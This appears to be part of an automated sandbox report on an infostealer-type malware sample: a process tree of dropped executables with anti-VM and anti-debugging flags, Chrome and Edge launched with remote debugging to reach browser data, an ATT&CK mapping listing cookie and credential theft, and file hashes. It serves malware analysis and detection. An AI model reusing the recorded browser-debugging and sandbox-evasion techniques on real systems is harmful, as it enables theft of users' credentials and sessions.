C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵PID:5748
-
-
-
C:\Users\Admin\AppData\Local\Temp\1087775001\59cc904836.exe"C:\Users\Admin\AppData\Local\Temp\1087775001\59cc904836.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6068
-
-
C:\Users\Admin\AppData\Local\Temp\1087776001\eee113fe4f.exe"C:\Users\Admin\AppData\Local\Temp\1087776001\eee113fe4f.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6656
-
-
C:\Users\Admin\AppData\Local\Temp\1087777001\4816cf3cfa.exe"C:\Users\Admin\AppData\Local\Temp\1087777001\4816cf3cfa.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:5096 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5096 -s 15926⤵
- Program crash
PID:5392
-
-
-
C:\Users\Admin\AppData\Local\Temp\1087778001\fc1506d9ee.exe"C:\Users\Admin\AppData\Local\Temp\1087778001\fc1506d9ee.exe"5⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4348
-
-
C:\Users\Admin\AppData\Local\Temp\1087779001\5f6e285793.exe"C:\Users\Admin\AppData\Local\Temp\1087779001\5f6e285793.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5516
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2b1895.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2b1895.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4296
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3H13t.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3H13t.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3092 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""3⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:384 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffae28dcc40,0x7ffae28dcc4c,0x7ffae28dcc584⤵PID:2936
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1812,i,6116340868949398025,8819502083650960886,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1808 /prefetch:24⤵PID:2664
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2140,i,6116340868949398025,8819502083650960886,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2200 /prefetch:34⤵PID:1160
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,6116340868949398025,8819502083650960886,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2544 /prefetch:84⤵PID:3772
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3228,i,6116340868949398025,8819502083650960886,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3240 /prefetch:14⤵
- Uses browser remote debugging
PID:3256
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3288,i,6116340868949398025,8819502083650960886,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3388 /prefetch:14⤵
- Uses browser remote debugging
PID:1880
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4156,i,6116340868949398025,8819502083650960886,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4584 /prefetch:14⤵
- Uses browser remote debugging
PID:3956
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4784,i,6116340868949398025,8819502083650960886,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4760 /prefetch:84⤵PID:5032
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4832,i,6116340868949398025,8819502083650960886,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4556 /prefetch:84⤵PID:4420
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4840,i,6116340868949398025,8819502083650960886,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4904 /prefetch:84⤵PID:864
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5044,i,6116340868949398025,8819502083650960886,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5056 /prefetch:84⤵PID:1284
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"3⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:3760 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffae28e46f8,0x7ffae28e4708,0x7ffae28e47184⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1696
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,6631741015541942704,1885411892256389691,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:24⤵PID:1060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,6631741015541942704,1885411892256389691,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:1376
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,6631741015541942704,1885411892256389691,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2292 /prefetch:24⤵PID:1700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,6631741015541942704,1885411892256389691,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:84⤵PID:3620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,6631741015541942704,1885411892256389691,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2816 /prefetch:24⤵PID:1728
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,6631741015541942704,1885411892256389691,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2676 /prefetch:24⤵PID:4708
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2120,6631741015541942704,1885411892256389691,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:14⤵
- Uses browser remote debugging
PID:4564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2120,6631741015541942704,1885411892256389691,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:14⤵
- Uses browser remote debugging
PID:4952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,6631741015541942704,1885411892256389691,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2792 /prefetch:24⤵PID:1924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,6631741015541942704,1885411892256389691,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2668 /prefetch:24⤵PID:2172
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,6631741015541942704,1885411892256389691,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3796 /prefetch:24⤵PID:4352
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,6631741015541942704,1885411892256389691,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3600 /prefetch:24⤵PID:2680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,6631741015541942704,1885411892256389691,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3548 /prefetch:24⤵PID:2268
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1404
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:3512
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:2252
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3068 -ip 30681⤵PID:4600
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2264 -ip 22641⤵PID:3144
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1560 -ip 15601⤵PID:1616
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4212 -ip 42121⤵PID:3108
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1560 -ip 15601⤵PID:1376
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1304 -ip 13041⤵PID:1560
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 6532 -ip 65321⤵PID:6664
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5736 -ip 57361⤵PID:5816
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5964
-
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exeC:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe1⤵
- Executes dropped EXE
PID:6468
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5452 -ip 54521⤵PID:5600
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5452 -ip 54521⤵PID:6836
-
C:\ProgramData\ruxcfe\gsfeqdc.exeC:\ProgramData\ruxcfe\gsfeqdc.exe start21⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5996
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5736 -ip 57361⤵PID:6464
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:6424
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6600
-
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exeC:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe1⤵
- Executes dropped EXE
PID:6556
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5096 -ip 50961⤵PID:5588
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Modify Authentication Process
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Authentication Process
1Modify Registry
6Virtualization/Sandbox Evasion
3Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
5Credentials In Files
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
Filesize
1.2MB
MD55ec72f13e4ee7a1f273d0562d5eef9a4
SHA1ce28b5e34db985f05e8e5baac59e9580b733ee48
SHA256dcc2661595065e5a3ae1da6796c2948740b3a90cd2f501be0269ded857028dfe
SHA512c5f8f4d38e18b9684bc8c35a98980db7c70bc4b9c2096429bbf5a1e6d41fe32ae5be80ea6eccc62572ec45ff0c50b1fc7b0c0fcbfc6689bf7e837deb02f4c940
-
Filesize
40B
MD509b9941268dbc63b2b6cc713894f3651
SHA1d3fa7baf5d1ceffd6012e2d5a01860e978146003
SHA256a7cfc8b6b668a30b1538077d2beff293931b122b3c2c7dd53acede6fe3f90ba8
SHA512f59389379e4919cebab0723807e9eb7e21396d669d9f31feb781dded193cbfb46f261f6ce42c89789df96506d49a2dca50f0ef7cd883c00c8eddf0e218b51ba1
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\1b5dcd77-d6ff-475c-81cf-302bfdd3df26.tmp
Filesize1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\MANIFEST-000001
Filesize41B
MD55af87dfd673ba2115e2fcf5cfdb727ab
SHA1d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b
-
Filesize
425B
MD5fff5cbccb6b31b40f834b8f4778a779a
SHA1899ed0377e89f1ed434cfeecc5bc0163ebdf0454
SHA256b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76
SHA5121a188a14c667bc31d2651b220aa762be9cce4a75713217846fbe472a307c7bbc6e3c27617f75f489902a534d9184648d204d03ee956ac57b11aa90551248b8f9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\28acd620-d164-4aed-810f-be10cfff3ebc.dmp
Filesize10.4MB
MD5d1a69eec5b260ec247c95a91562c9b2b
SHA17d3e54aafd21d2578aa3db50bc3b10fcd7c2f58b
SHA2567f45b9754008e46cd7897b27ced3ffd233b623489f4fec0a7d991bd536e796ac
SHA5126cadeeec8aacb04d4caf07bb9c74e83d8ea6b4259fea92e08054aff32b2dbd482e77cfb4c78f24ff031e894d512f93e466ef70dcc7f35ee64547e747d2b0657a
-
Filesize
152B
MD5f2b08db3d95297f259f5aabbc4c36579
SHA1f5160d14e7046d541aee0c51c310b671e199f634
SHA256a43c97e4f52c27219be115d0d63f8ff38f98fc60f8aab81136e068ba82929869
SHA5123256d03196afe4fbe81ae359526e686684f5ef8ef03ce500c64a3a8a79c72b779deff71cf64c0ece7d21737ffc67062ec8114c3de5cafd7e8313bb0d08684c75
-
Filesize
152B
MD56cdd2d2aae57f38e1f6033a490d08b79
SHA1a54cb1af38c825e74602b18fb1280371c8865871
SHA25656e7dc53fb8968feac9775fc4e2f5474bab2d10d5f1a5db8037435694062fbff
SHA5126cf1ccd4bc6ef53d91c64f152e90f2756f34999a9b9036dc3c4423ec33e0dcee840e754d5efac6715411751facbe78acc6229a2c849877589755f7f578ef949a
-
Filesize
6KB
MD570738b74cb6d233ca58625a5a7dbccb9
SHA12ff515b43bb01e35bc75bee37fcc745404d098a0
SHA25636922bdb1ef176bc1930162c16b4c9d9e9c4686811398e2469ad803672a67b4a
